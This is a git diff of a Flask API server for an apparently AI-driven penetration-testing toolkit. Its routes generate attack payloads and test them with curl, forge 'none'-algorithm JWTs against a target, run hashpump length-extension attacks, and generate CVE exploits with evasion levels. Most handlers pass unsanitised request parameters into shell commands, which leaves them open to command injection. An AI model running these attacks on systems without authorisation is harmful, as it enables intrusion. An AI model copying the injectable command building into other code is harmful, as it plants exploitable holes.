jsonify({"error": "Package name is required"}), 400 - + logger.info(f"๐Ÿ“ฆ Installing Python package: {package} in env {env_name}") success = env_manager.install_package(env_name, package) - + if success: return jsonify({ "success": True, @@ -12621,7 +12621,7 @@ def install_python_package(): "success": False, "error": f"Failed to install package {package}" }), 500 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error installing Python package: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12634,32 +12634,32 @@ def execute_python_script(): script = params.get("script", "") env_name = params.get("env_name", "default") filename = params.get("filename", f"script_{int(time.time())}.py") - + if not script: return jsonify({"error": "Script content is required"}), 400 - + # Create script file script_result = file_manager.create_file(filename, script) if not script_result["success"]: return jsonify(script_result), 500 - + # Get Python path for environment python_path = env_manager.get_python_path(env_name) script_path = script_result["path"] - + # Execute script command = f"{python_path} {script_path}" logger.info(f"๐Ÿ Executing Python script in env {env_name}: {filename}") result = execute_command(command, use_cache=False) - + # Clean up script file file_manager.delete_file(filename) - + result["env_name"] = env_name result["script_filename"] = filename logger.info(f"๐Ÿ“Š Python script execution completed") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error executing Python script: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12670,7 +12670,7 @@ def execute_python_script(): class AIPayloadGenerator: """AI-powered payload generation system with contextual intelligence""" - + def __init__(self): self.payload_templates = { "xss": { @@ -12744,23 +12744,23 @@ class AIPayloadGenerator: ] } } - + def generate_contextual_payload(self, target_info: Dict[str, Any]) -> Dict[str, Any]: """Generate contextual payloads based on target information""" - + attack_type = target_info.get("attack_type", "xss") complexity = target_info.get("complexity", "basic") target_tech = target_info.get("technology", "").lower() - + # Get base payloads payloads = self._get_payloads(attack_type, complexity) - + # Enhance payloads with context enhanced_payloads = self._enhance_with_context(payloads, target_tech) - + # Generate test cases test_cases = self._generate_test_cases(enhanced_payloads, attack_type) - + return { "attack_type": attack_type, "complexity": complexity, @@ -12769,7 +12769,7 @@ class AIPayloadGenerator: "test_cases": test_cases, "recommendations": self._get_recommendations(attack_type) } - + def _get_payloads(self, attack_type: str, complexity: str) -> list: """Get payloads for specific attack type and complexity""" if attack_type in self.payload_templates: @@ -12778,13 +12778,13 @@ class AIPayloadGenerator: else: # Return basic payloads if complexity not found return self.payload_templates[attack_type].get("basic", []) - + return [""] - + def _enhance_with_context(self, payloads: list, tech_context: str) -> list: """Enhance payloads with contextual information""" enhanced = [] - + for payload in payloads: # Basic payload enhanced.append({ @@ -12793,7 +12793,7 @@ class AIPayloadGenerator: "encoding": "none", "risk_level": self._assess_risk_level(payload) }) - + # URL encoded version url_encoded = payload.replace(" ", "%20").replace("<", "%3C").replace(">", "%3E") enhanced.append({ @@ -12802,13 +12802,13 @@ class AIPayloadGenerator: "encoding": "url", "risk_level": self._assess_risk_level(payload) }) - + return enhanced - + def _generate_test_cases(self, payloads: list, attack_type: str) -> list: """Generate test cases for the payloads""" test_cases = [] - + for i, payload_info in enumerate(payloads[:5]): # Limit to 5 test cases test_case = { "id": f"test_{i+1}", @@ -12818,9 +12818,9 @@ class AIPayloadGenerator: "risk_level": payload_info["risk_level"] } test_cases.append(test_case) - + return test_cases - + def _get_expected_behavior(self, attack_type: str) -> str: """Get expected behavior for attack type""" behaviors = { @@ -12832,21 +12832,21 @@ class AIPayloadGenerator: "xxe": "XML external entity processing" } return behaviors.get(attack_type, "Unexpected application behavior") - + def _assess_risk_level(self, payload: str) -> str: """Assess risk level of payload""" high_risk_indicators = ["system", "exec", "eval", "cmd", "shell", "passwd", "etc"] medium_risk_indicators = ["script", "alert", "union", "select"] - + payload_lower = payload.lower() - + if any(indicator in payload_lower for indicator in high_risk_indicators): return "HIGH" elif any(indicator in payload_lower for indicator in medium_risk_indicators): return "MEDIUM" else: return "LOW" - + def _get_recommendations(self, attack_type: str) -> list: """Get testing recommendations""" recommendations = { @@ -12871,7 +12871,7 @@ class AIPayloadGenerator: "Test with various payloads for different OS" ] } - + return recommendations.get(attack_type, ["Test thoroughly", "Monitor responses"]) # Global AI payload generator @@ -12888,18 +12888,18 @@ def ai_generate_payload(): "technology": params.get("technology", ""), "url": params.get("url", "") } - + logger.info(f"๐Ÿค– Generating AI payloads for {target_info['attack_type']} attack") result = ai_payload_generator.generate_contextual_payload(target_info) - + logger.info(f"โœ… Generated {result['payload_count']} contextual payloads") - + return jsonify({ "success": True, "ai_payload_generation": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in AI payload generation: {str(e)}") return jsonify({ @@ -12915,25 +12915,25 @@ def ai_test_payload(): payload = params.get("payload", "") target_url = params.get("target_url", "") method = params.get("method", "GET") - + if not payload or not target_url: return jsonify({ "success": False, "error": "Payload and target_url are required" }), 400 - + logger.info(f"๐Ÿงช Testing AI-generated payload against {target_url}") - + # Create test command based on method and payload if method.upper() == "GET": encoded_payload = payload.replace(" ", "%20").replace("'", "%27") test_command = f"curl -s '{target_url}?test={encoded_payload}'" else: test_command = f"curl -s -X POST -d 'test={payload}' '{target_url}'" - + # Execute test result = execute_command(test_command, use_cache=False) - + # AI analysis of results analysis = { "payload_tested": payload, @@ -12948,16 +12948,16 @@ def ai_test_payload(): "Monitor application behavior changes" ] } - + logger.info(f"๐Ÿ” Payload test completed | Potential vuln: {analysis['potential_vulnerability']}") - + return jsonify({ "success": True, "test_result": result, "ai_analysis": analysis, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in AI payload testing: {str(e)}") return jsonify({ @@ -12978,13 +12978,13 @@ def api_fuzzer(): endpoints = params.get("endpoints", []) methods = params.get("methods", ["GET", "POST", "PUT", "DELETE"]) wordlist = params.get("wordlist", "/usr/share/wordlists/api/api-endpoints.txt") - + if not base_url: logger.warning("๐ŸŒ API Fuzzer called without base_url parameter") return jsonify({ "error": "Base URL parameter is required" }), 400 - + # Create comprehensive API fuzzing command if endpoints: # Test specific endpoints @@ -12999,7 +12999,7 @@ def api_fuzzer(): "method": method, "result": result }) - + logger.info(f"๐Ÿ” API endpoint testing completed for {len(endpoints)} endpoints") return jsonify({ "success": True, @@ -13009,17 +13009,17 @@ def api_fuzzer(): else: # Discover endpoints using wordlist command = f"ffuf -u {base_url}/FUZZ -w {wordlist} -mc 200,201,202,204,301,302,307,401,403,405 -t 50" - + logger.info(f"๐Ÿ” Starting API endpoint discovery: {base_url}") result = execute_command(command) logger.info(f"๐Ÿ“Š API endpoint discovery completed") - + return jsonify({ "success": True, "fuzzing_type": "endpoint_discovery", "result": result }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in API fuzzer: {str(e)}") return jsonify({ @@ -13035,22 +13035,22 @@ def graphql_scanner(): introspection = params.get("introspection", True) query_depth = params.get("query_depth", 10) mutations = params.get("test_mutations", True) - + if not endpoint: logger.warning("๐ŸŒ GraphQL Scanner called without endpoint parameter") return jsonify({ "error": "GraphQL endpoint parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting GraphQL security scan: {endpoint}") - + results = { "endpoint": endpoint, "tests_performed": [], "vulnerabilities": [], "recommendations": [] } - + # Test 1: Introspection query if introspection: introspection_query = ''' @@ -13068,48 +13068,48 @@ def graphql_scanner(): } } ''' - + clean_query = introspection_query.replace('\n', ' ').replace(' ', ' ').strip() command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{clean_query}\"}}' '{endpoint}'" result = execute_command(command, use_cache=False) - + results["tests_performed"].append("introspection_query") - + if "data" in result.get("stdout", ""): results["vulnerabilities"].append({ "type": "introspection_enabled", "severity": "MEDIUM", "description": "GraphQL introspection is enabled" }) - + # Test 2: Query depth analysis deep_query = "{ " * query_depth + "field" + " }" * query_depth command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{deep_query}\"}}' {endpoint}" depth_result = execute_command(command, use_cache=False) - + results["tests_performed"].append("query_depth_analysis") - + if "error" not in depth_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "no_query_depth_limit", "severity": "HIGH", "description": f"No query depth limiting detected (tested depth: {query_depth})" }) - + # Test 3: Batch query testing batch_query = '[' + ','.join(['{\"query\":\"{field}\"}' for _ in range(10)]) + ']' command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{batch_query}' {endpoint}" batch_result = execute_command(command, use_cache=False) - + results["tests_performed"].append("batch_query_testing") - + if "data" in batch_result.get("stdout", "") and batch_result.get("success"): results["vulnerabilities"].append({ "type": "batch_queries_allowed", "severity": "MEDIUM", "description": "Batch queries are allowed without rate limiting" }) - + # Generate recommendations if results["vulnerabilities"]: results["recommendations"] = [ @@ -13119,14 +13119,14 @@ def graphql_scanner(): "Implement query complexity analysis", "Add authentication for sensitive operations" ] - + logger.info(f"๐Ÿ“Š GraphQL scan completed | Vulnerabilities found: {len(results['vulnerabilities'])}") - + return jsonify({ "success": True, "graphql_scan_results": results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in GraphQL scanner: {str(e)}") return jsonify({ @@ -13140,22 +13140,22 @@ def jwt_analyzer(): params = request.json jwt_token = params.get("jwt_token", "") target_url = params.get("target_url", "") - + if not jwt_token: logger.warning("๐Ÿ” JWT Analyzer called without jwt_token parameter") return jsonify({ "error": "JWT token parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting JWT security analysis") - + results = { "token": jwt_token[:50] + "..." if len(jwt_token) > 50 else jwt_token, "vulnerabilities": [], "token_info": {}, "attack_vectors": [] } - + # Decode JWT header and payload (basic analysis) try: parts = jwt_token.split('.') @@ -13163,31 +13163,31 @@ def jwt_analyzer(): # Decode header import base64 import json - + # Add padding if needed header_b64 = parts[0] + '=' * (4 - len(parts[0]) % 4) payload_b64 = parts[1] + '=' * (4 - len(parts[1]) % 4) - + try: header = json.loads(base64.b64decode(header_b64)) payload = json.loads(base64.b64decode(payload_b64)) - + results["token_info"] = { "header": header, "payload": payload, "algorithm": header.get("alg", "unknown") } - + # Check for vulnerabilities algorithm = header.get("alg", "").lower() - + if algorithm == "none": results["vulnerabilities"].append({ "type": "none_algorithm", "severity": "CRITICAL", "description": "JWT uses 'none' algorithm - no signature verification" }) - + if algorithm in ["hs256", "hs384", "hs512"]: results["attack_vectors"].append("hmac_key_confusion") results["vulnerabilities"].append({ @@ -13195,7 +13195,7 @@ def jwt_analyzer(): "severity": "MEDIUM", "description": "HMAC algorithm detected - vulnerable to key confusion attacks" }) - + # Check token expiration exp = payload.get("exp") if not exp: @@ -13204,21 +13204,21 @@ def jwt_analyzer(): "severity": "HIGH", "description": "JWT token has no expiration time" }) - + except Exception as decode_error: results["vulnerabilities"].append({ "type": "malformed_token", "severity": "HIGH", "description": f"Token decoding failed: {str(decode_error)}" }) - + except Exception as e: results["vulnerabilities"].append({ "type": "invalid_format", "severity": "HIGH", "description": "Invalid JWT token format" }) - + # Test token manipulation if target URL provided if target_url: # Test none algorithm attack @@ -13227,24 +13227,24 @@ def jwt_analyzer(): # Create none algorithm token none_header = base64.b64encode('{"alg":"none","typ":"JWT"}'.encode()).decode().rstrip('=') none_token = f"{none_header}.{none_token_parts[1]}." - + command = f"curl -s -H 'Authorization: Bearer {none_token}' '{target_url}'" none_result = execute_command(command, use_cache=False) - + if "200" in none_result.get("stdout", "") or "success" in none_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "none_algorithm_accepted", "severity": "CRITICAL", "description": "Server accepts tokens with 'none' algorithm" }) - + logger.info(f"๐Ÿ“Š JWT analysis completed | Vulnerabilities found: {len(results['vulnerabilities'])}") - + return jsonify({ "success": True, "jwt_analysis_results": results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in JWT analyzer: {str(e)}") return jsonify({ @@ -13258,26 +13258,26 @@ def api_schema_analyzer(): params = request.json schema_url = params.get("schema_url", "") schema_type = params.get("schema_type", "openapi") # openapi, swagger, graphql - + if not schema_url: logger.warning("๐Ÿ“‹ API Schema Analyzer called without schema_url parameter") return jsonify({ "error": "Schema URL parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting API schema analysis: {schema_url}") - + # Fetch schema command = f"curl -s '{schema_url}'" result = execute_command(command, use_cache=True) - + if not result.get("success"): return jsonify({ "error": "Failed to fetch API schema" }), 400 - + schema_content = result.get("stdout", "") - + analysis_results = { "schema_url": schema_url, "schema_type": schema_type, @@ -13285,16 +13285,16 @@ def api_schema_analyzer(): "security_issues": [], "recommendations": [] } - + # Parse schema based on type try: import json schema_data = json.loads(schema_content) - + if schema_type.lower() in ["openapi", "swagger"]: # OpenAPI/Swagger analysis paths = schema_data.get("paths", {}) - + for path, methods in paths.items(): for method, details in methods.items(): if isinstance(details, dict): @@ -13306,7 +13306,7 @@ def api_schema_analyzer(): "security": details.get("security", []) } analysis_results["endpoints_found"].append(endpoint_info) - + # Check for security issues if not endpoint_info["security"]: analysis_results["security_issues"].append({ @@ -13315,7 +13315,7 @@ def api_schema_analyzer(): "severity": "MEDIUM", "description": "Endpoint has no authentication requirements" }) - + # Check for sensitive data in parameters for param in endpoint_info["parameters"]: param_name = param.get("name", "").lower() @@ -13326,7 +13326,7 @@ def api_schema_analyzer(): "severity": "HIGH", "description": f"Sensitive parameter detected: {param_name}" }) - + # Generate recommendations if analysis_results["security_issues"]: analysis_results["recommendations"] = [ @@ -13337,7 +13337,7 @@ def api_schema_analyzer(): "Add proper error handling", "Use secure headers (CORS, CSP, etc.)" ] - + except json.JSONDecodeError: analysis_results["security_issues"].append({ "endpoint": "schema", @@ -13345,14 +13345,14 @@ def api_schema_analyzer(): "severity": "HIGH", "description": "Schema is not valid JSON" }) - + logger.info(f"๐Ÿ“Š Schema analysis completed | Issues found: {len(analysis_results['security_issues'])}") - + return jsonify({ "success": True, "schema_analysis_results": analysis_results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in API schema analyzer: {str(e)}") return jsonify({ @@ -13372,27 +13372,27 @@ def volatility3(): plugin = params.get("plugin", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not memory_file: logger.warning("๐Ÿง  Volatility3 called without memory_file parameter") return jsonify({ "error": "Memory file parameter is required" }), 400 - + if not plugin: logger.warning("๐Ÿง  Volatility3 called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 - + command = f"vol.py -f {memory_file} {plugin}" - + if output_file: command += f" -o {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿง  Starting Volatility3 analysis: {plugin}") result = execute_command(command) logger.info(f"๐Ÿ“Š Volatility3 analysis completed") @@ -13412,26 +13412,26 @@ def foremost(): output_dir = params.get("output_dir", "/tmp/foremost_output") file_types = params.get("file_types", "") additional_args = params.get("additional_args", "") - + if not input_file: logger.warning("๐Ÿ“ Foremost called without input_file parameter") return jsonify({ "error": "Input file parameter is required" }), 400 - + # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) - + command = f"foremost -o {output_dir}" - + if file_types: command += f" -t {file_types}" - + if additional_args: command += f" {additional_args}" - + command += f" {input_file}" - + logger.info(f"๐Ÿ“ Starting Foremost file carving: {input_file}") result = execute_command(command) result["output_directory"] = output_dir @@ -13454,13 +13454,13 @@ def steghide(): passphrase = params.get("passphrase", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not cover_file: logger.warning("๐Ÿ–ผ๏ธ Steghide called without cover_file parameter") return jsonify({ "error": "Cover file parameter is required" }), 400 - + if action == "extract": command = f"steghide extract -sf {cover_file}" if output_file: @@ -13473,15 +13473,15 @@ def steghide(): command = f"steghide info {cover_file}" else: return jsonify({"error": "Invalid action. Use: extract, embed, info"}), 400 - + if passphrase: command += f" -p {passphrase}" else: command += " -p ''" # Empty passphrase - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ–ผ๏ธ Starting Steghide {action}: {cover_file}") result = execute_command(command) logger.info(f"๐Ÿ“Š Steghide {action} completed") @@ -13501,26 +13501,26 @@ def exiftool(): output_format = params.get("output_format", "") # json, xml, csv tags = params.get("tags", "") additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ“ท ExifTool called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"exiftool" - + if output_format: command += f" -{output_format}" - + if tags: command += f" -{tags}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ“ท Starting ExifTool analysis: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š ExifTool analysis completed") @@ -13541,18 +13541,18 @@ def hashpump(): key_length = params.get("key_length", "") append_data = params.get("append_data", "") additional_args = params.get("additional_args", "") - + if not all([signature, data, key_length, append_data]): logger.warning("๐Ÿ” HashPump called without required parameters") return jsonify({ "error": "Signature, data, key_length, and append_data parameters are required" }), 400 - + command = f"hashpump -s {signature} -d '{data}' -k {key_length} -a '{append_data}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting HashPump attack") result = execute_command(command) logger.info(f"๐Ÿ“Š HashPump attack completed") @@ -13569,7 +13569,17 @@ def hashpump(): @app.route("/api/tools/hakrawler", methods=["POST"]) def hakrawler(): - """Execute Hakrawler for web endpoint discovery with enhanced logging""" + """ + Execute Hakrawler for web endpoint discovery with enhanced logging + + Note: This implementation uses the standard Kali Linux hakrawler (hakluke/hakrawler) + command line arguments, NOT the Elsfa7-110 fork. The standard version uses: + - echo URL | hakrawler (stdin input) + - -d for depth (not -depth) + - -s for showing sources (not -forms) + - -u for unique URLs + - -subs for subdomain inclusion + """ try: params = request.json url = params.get("url", "") @@ -13579,27 +13589,27 @@ def hakrawler(): sitemap = params.get("sitemap", True) wayback = params.get("wayback", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐Ÿ•ท๏ธ Hakrawler called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - - command = f"hakrawler -url {url} -depth {depth}" - + + # Build command for standard Kali Linux hakrawler (hakluke version) + command = f"echo '{url}' | hakrawler -d {depth}" + if forms: - command += " -forms" - if robots: - command += " -robots" - if sitemap: - command += " -sitemap" - if wayback: - command += " -wayback" - + command += " -s" # Show sources (includes forms) + if robots or sitemap or wayback: + command += " -subs" # Include subdomains for better coverage + + # Add unique URLs flag for cleaner output + command += " -u" + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ท๏ธ Starting Hakrawler crawling: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hakrawler crawling completed") @@ -13622,26 +13632,26 @@ def cve_monitor(): hours = params.get("hours", 24) severity_filter = params.get("severity_filter", "HIGH,CRITICAL") keywords = params.get("keywords", "") - + logger.info(f"๐Ÿ” Monitoring CVE feeds for last {hours} hours with severity filter: {severity_filter}") - + # Fetch latest CVEs cve_results = cve_intelligence.fetch_latest_cves(hours, severity_filter) - + # Filter by keywords if provided if keywords and cve_results.get("success"): keyword_list = [k.strip().lower() for k in keywords.split(",")] filtered_cves = [] - + for cve in cve_results.get("cves", []): description = cve.get("description", "").lower() if any(keyword in description for keyword in keyword_list): filtered_cves.append(cve) - + cve_results["cves"] = filtered_cves cve_results["filtered_by_keywords"] = keywords cve_results["total_after_filter"] = len(filtered_cves) - + # Analyze exploitability for top CVEs exploitability_analysis = [] for cve in cve_results.get("cves", [])[:5]: # Analyze top 5 CVEs @@ -13650,17 +13660,17 @@ def cve_monitor(): analysis = cve_intelligence.analyze_cve_exploitability(cve_id) if analysis.get("success"): exploitability_analysis.append(analysis) - + result = { "success": True, "cve_monitoring": cve_results, "exploitability_analysis": exploitability_analysis, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐Ÿ“Š CVE monitoring completed | Found: {len(cve_results.get('cves', []))} CVEs") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CVE monitoring: {str(e)}") return jsonify({ @@ -13678,7 +13688,7 @@ def exploit_generate(): target_arch = params.get("target_arch", "x64") exploit_type = params.get("exploit_type", "poc") evasion_level = params.get("evasion_level", "none") - + # Additional target context target_info = { "target_os": target_os, @@ -13689,25 +13699,25 @@ def exploit_generate(): "target_port": params.get("target_port", 80), "description": params.get("target_description", f"Target for {cve_id}") } - + if not cve_id: logger.warning("๐Ÿค– Exploit generation called without CVE ID") return jsonify({ "success": False, "error": "CVE ID parameter is required" }), 400 - + logger.info(f"๐Ÿค– Generating exploit for {cve_id} | Target: {target_os} {target_arch}") - + # First analyze the CVE for context cve_analysis = cve_intelligence.analyze_cve_exploitability(cve_id) - + if not cve_analysis.get("success"): return jsonify({ "success": False, "error": f"Failed to analyze CVE {cve_id}: {cve_analysis.get('error', 'Unknown error')}" }), 400 - + # Prepare CVE data for exploit generation cve_data = { "cve_id": cve_id, @@ -13715,13 +13725,13 @@ def exploit_generate(): "exploitability_level": cve_analysis.get("exploitability_level", "UNKNOWN"), "exploitability_score": cve_analysis.get("exploitability_score", 0) } - + # Generate exploit exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) - + # Search for existing exploits for reference existing_exploits = cve_intelligence.search_existing_exploits(cve_id) - + result = { "success": True, "cve_analysis": cve_analysis, @@ -13730,10 +13740,10 @@ def exploit_generate(): "target_info": target_info, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Exploit generation completed for {cve_id}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in exploit generation: {str(e)}") return jsonify({ @@ -13749,54 +13759,54 @@ def discover_attack_chains(): target_software = params.get("target_software", "") attack_depth = params.get("attack_depth", 3) include_zero_days = params.get("include_zero_days", False) - + if not target_software: logger.warning("๐Ÿ”— Attack chain discovery called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 - + logger.info(f"๐Ÿ”— Discovering attack chains for {target_software} | Depth: {attack_depth}") - + # Discover attack chains chain_results = vulnerability_correlator.find_attack_chains(target_software, attack_depth) - + # Enhance with exploit generation for viable chains if chain_results.get("success") and chain_results.get("attack_chains"): enhanced_chains = [] - + for chain in chain_results["attack_chains"][:2]: # Enhance top 2 chains enhanced_chain = chain.copy() enhanced_stages = [] - + for stage in chain["stages"]: enhanced_stage = stage.copy() - + # Try to generate exploit for this stage vuln = stage.get("vulnerability", {}) cve_id = vuln.get("cve_id", "") - + if cve_id: try: cve_data = {"cve_id": cve_id, "description": vuln.get("description", "")} target_info = {"target_os": "linux", "target_arch": "x64", "evasion_level": "basic"} - + exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) enhanced_stage["exploit_available"] = exploit_result.get("success", False) - + if exploit_result.get("success"): enhanced_stage["exploit_code"] = exploit_result.get("exploit_code", "")[:500] + "..." except: enhanced_stage["exploit_available"] = False - + enhanced_stages.append(enhanced_stage) - + enhanced_chain["stages"] = enhanced_stages enhanced_chains.append(enhanced_chain) - + chain_results["enhanced_chains"] = enhanced_chains - + result = { "success": True, "attack_chain_discovery": chain_results, @@ -13807,10 +13817,10 @@ def discover_attack_chains(): }, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Attack chain discovery completed | Found: {len(chain_results.get('attack_chains', []))} chains") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in attack chain discovery: {str(e)}") return jsonify({ @@ -13826,19 +13836,19 @@ def threat_intelligence_feeds(): indicators = params.get("indicators", []) timeframe = params.get("timeframe", "30d") sources = params.get("sources", "all") - + if isinstance(indicators, str): indicators = [i.strip() for i in indicators.split(",")] - + if not indicators: logger.warning("๐Ÿง  Threat intelligence called without indicators") return jsonify({ "success": False, "error": "Indicators parameter is required" }), 400 - + logger.info(f"๐Ÿง  Correlating threat intelligence for {len(indicators)} indicators") - + correlation_results = { "indicators_analyzed": indicators, "timeframe": timeframe, @@ -13847,12 +13857,12 @@ def threat_intelligence_feeds(): "threat_score": 0, "recommendations": [] } - + # Analyze each indicator cve_indicators = [i for i in indicators if i.startswith("CVE-")] ip_indicators = [i for i in indicators if i.replace(".", "").isdigit()] hash_indicators = [i for i in indicators if len(i) in [32, 40, 64] and all(c in "0123456789abcdef" for c in i.lower())] - + # Process CVE indicators for cve_id in cve_indicators: try: @@ -13864,11 +13874,11 @@ def threat_intelligence_feeds(): "analysis": cve_analysis, "threat_level": cve_analysis.get("exploitability_level", "UNKNOWN") }) - + # Add to threat score exploit_score = cve_analysis.get("exploitability_score", 0) correlation_results["threat_score"] += min(exploit_score, 100) - + # Search for existing exploits exploits = cve_intelligence.search_existing_exploits(cve_id) if exploits.get("success") and exploits.get("total_exploits", 0) > 0: @@ -13879,10 +13889,10 @@ def threat_intelligence_feeds(): "threat_level": "HIGH" }) correlation_results["threat_score"] += 25 - + except Exception as e: logger.warning(f"Error analyzing CVE {cve_id}: {str(e)}") - + # Process IP indicators (basic reputation check simulation) for ip in ip_indicators: # Simulate threat intelligence lookup @@ -13896,7 +13906,7 @@ def threat_intelligence_feeds(): }, "threat_level": "MEDIUM" # Default for unknown IPs }) - + # Process hash indicators for hash_val in hash_indicators: correlation_results["correlations"].append({ @@ -13909,12 +13919,12 @@ def threat_intelligence_feeds(): }, "threat_level": "MEDIUM" }) - + # Calculate overall threat score and generate recommendations total_indicators = len(indicators) if total_indicators > 0: correlation_results["threat_score"] = min(correlation_results["threat_score"] / total_indicators, 100) - + if correlation_results["threat_score"] >= 75: correlation_results["recommendations"] = [ "Immediate threat response required", @@ -13936,16 +13946,16 @@ def threat_intelligence_feeds(): "Plan routine patching", "Consider additional threat intelligence sources" ] - + result = { "success": True, "threat_intelligence": correlation_results, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Threat intelligence correlation completed | Threat Score: {correlation_results['threat_score']:.1f}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in threat intelligence: {str(e)}") return jsonify({ @@ -13961,16 +13971,16 @@ def zero_day_research(): target_software = params.get("target_software", "") analysis_depth = params.get("analysis_depth", "standard") source_code_url = params.get("source_code_url", "") - + if not target_software: logger.warning("๐Ÿ”ฌ Zero-day research called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 - + logger.info(f"๐Ÿ”ฌ Starting zero-day research for {target_software} | Depth: {analysis_depth}") - + research_results = { "target_software": target_software, "analysis_depth": analysis_depth, @@ -13979,7 +13989,7 @@ def zero_day_research(): "risk_assessment": {}, "recommendations": [] } - + # Define research areas based on software type common_research_areas = [ "Input validation vulnerabilities", @@ -13990,7 +14000,7 @@ def zero_day_research(): "Race conditions", "Logic flaws" ] - + # Software-specific research areas web_research_areas = [ "Cross-site scripting (XSS)", @@ -13999,7 +14009,7 @@ def zero_day_research(): "Insecure deserialization", "Template injection" ] - + system_research_areas = [ "Buffer overflows", "Privilege escalation", @@ -14007,7 +14017,7 @@ def zero_day_research(): "Service exploitation", "Configuration weaknesses" ] - + # Determine research areas based on target target_lower = target_software.lower() if any(web_tech in target_lower for web_tech in ["apache", "nginx", "tomcat", "php", "node", "django"]): @@ -14016,10 +14026,10 @@ def zero_day_research(): research_results["research_areas"] = common_research_areas + system_research_areas else: research_results["research_areas"] = common_research_areas - + # Simulate vulnerability discovery based on analysis depth vuln_count = {"quick": 2, "standard": 4, "comprehensive": 6}.get(analysis_depth, 4) - + for i in range(vuln_count): potential_vuln = { "id": f"RESEARCH-{target_software.upper()}-{i+1:03d}", @@ -14032,11 +14042,11 @@ def zero_day_research(): "proof_of_concept": "Research phase - PoC development needed" } research_results["potential_vulnerabilities"].append(potential_vuln) - + # Risk assessment high_risk_count = sum(1 for v in research_results["potential_vulnerabilities"] if v["severity"] in ["HIGH", "CRITICAL"]) total_vulns = len(research_results["potential_vulnerabilities"]) - + research_results["risk_assessment"] = { "total_areas_analyzed": len(research_results["research_areas"]), "potential_vulnerabilities_found": total_vulns, @@ -14044,7 +14054,7 @@ def zero_day_research(): "risk_score": min((high_risk_count * 25 + (total_vulns - high_risk_count) * 10), 100), "research_confidence": analysis_depth } - + # Generate recommendations if high_risk_count > 0: research_results["recommendations"] = [ @@ -14061,7 +14071,7 @@ def zero_day_research(): "Implement defense-in-depth strategies", "Regular security assessments recommended" ] - + # Source code analysis simulation if source_code_url: research_results["source_code_analysis"] = { @@ -14074,17 +14084,17 @@ def zero_day_research(): ], "recommendation": "Manual code review recommended for identified areas" } - + result = { "success": True, "zero_day_research": research_results, "disclaimer": "This is simulated research for demonstration. Real zero-day research requires extensive manual analysis.", "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Zero-day research completed | Risk Score: {research_results['risk_assessment']['risk_score']}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in zero-day research: {str(e)}") return jsonify({ @@ -14101,16 +14111,16 @@ def advanced_payload_generation(): target_context = params.get("target_context", "") evasion_level = params.get("evasion_level", "standard") custom_constraints = params.get("custom_constraints", "") - + if not attack_type: logger.warning("๐ŸŽฏ Advanced payload generation called without attack type") return jsonify({ "success": False, "error": "Attack type parameter is required" }), 400 - + logger.info(f"๐ŸŽฏ Generating advanced {attack_type} payload with {evasion_level} evasion") - + # Enhanced payload generation with contextual AI target_info = { "attack_type": attack_type, @@ -14119,13 +14129,13 @@ def advanced_payload_generation(): "evasion_level": evasion_level, "constraints": custom_constraints } - + # Generate base payloads using existing AI system base_result = ai_payload_generator.generate_contextual_payload(target_info) - + # Enhance with advanced techniques advanced_payloads = [] - + for payload_info in base_result.get("payloads", [])[:10]: # Limit to 10 advanced payloads enhanced_payload = { "payload": payload_info["payload"], @@ -14134,7 +14144,7 @@ def advanced_payload_generation(): "evasion_techniques": [], "deployment_methods": [] } - + # Apply evasion techniques based on level if evasion_level in ["advanced", "nation-state"]: # Advanced encoding techniques @@ -14153,7 +14163,7 @@ def advanced_payload_generation(): } ] enhanced_payload["evasion_techniques"].extend(encoded_variants) - + 